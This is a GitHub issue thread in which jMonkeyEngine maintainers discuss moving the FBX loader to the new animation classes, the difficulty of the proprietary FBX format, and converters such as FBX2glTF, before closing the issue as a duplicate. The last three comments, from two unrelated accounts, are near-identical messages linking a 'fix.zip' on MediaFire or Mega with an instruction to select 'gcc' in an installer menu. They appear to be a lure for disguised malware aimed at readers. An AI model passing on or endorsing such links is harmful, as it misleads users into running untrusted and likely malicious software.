### ISSUE TITLE
FBX loader should use the new jME animation classes

### ISSUE THREAD

**Issue by tonihele** [jMonkeyEngine/jmonkeyengine#2227] opened 2024-03-17 14:55 UTC
FBX loader should use the new jME animation classes. I tested with this https://sketchfab.com/3d-models/silver-dragonkin-mir4-89ead4e87cdc4b70840f748383f0998f.

**Comment by stephengold** [comment] 2024-03-30 05:17
or perhaps we should simply remove the FBX loader, similar to how we removed the Blender loader at 221acaad ...

**Comment by tonihele** [comment] 2024-04-06 07:45
> or perhaps we should simply remove the FBX loader, similar to how we removed the Blender loader at [221acaa](https://github.com/jMonkeyEngine/jmonkeyengine/commit/221acaadfe565a7f112b9df74226ae9bec7dbab7) ...

Oh noes :D https://github.com/jMonkeyEngine/sdk/issues/584. We just hooked it up. After we removed it too. I think at some point the SDK used the bundled Blender to load FBX. Through some conversion etc.

**Comment by stephengold** [comment] 2024-04-06 17:08
Similar to .blend format, FBX has changed dramatically over time. But FBX is even tougher to import IMO, since the format is proprietary. I imagine one must reverse-engineer it, which I assume invalidates any Autodesk software licenses one owns. I've no idea what Unity and Unreal do. Perhaps they pay $$ to Autodesk for proprietary info.

I did some work on JME's `FbxLoader` back in January 2023, but quickly gave up. I think it's telling that there aren't any FBX models in jme3-testdata. It's also telling that [Assimp](https://github.com/assimp/assimp)'s support for FBX ended at FBX version 7.4 (aka version 7400), which is 10 years old at this point.

In the past, I've used [FBX2glTF](https://github.com/facebookincubator/FBX2glTF), which was recommended to me by capdevon. He told me the Godot engine was using a fork of this project.

I haven't tried importing FBX into Blender, so I'm unsure how reliable its importer is. Capdevon told me there were issues.

**Comment by stephengold** [comment] 2024-04-06 17:15
Even if we keep `FbxLoader`, this is a low-priority issue, in my opinion. Not only do JME and Minie still fully support the old animation system, but if one successfully imports an FBX model using `FbxLoader`, it can trivially be converted to the new animation system using `AnimMigrationUtils`.

**Comment by tonihele** [comment] 2024-04-06 17:47
Yeah, I agree it is a low priority issue. Just general housekeeping...

**Comment by stephengold** [comment] 2024-04-22 17:04
Also, this appears to be a duplicate of issue #1415.

**Closed** 2024-05-04 21:40 UTC

**Comment by esttemanb** [comment] 2024-08-25 08:23
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment] 2024-08-25 08:27
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment] 2024-08-25 08:51
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
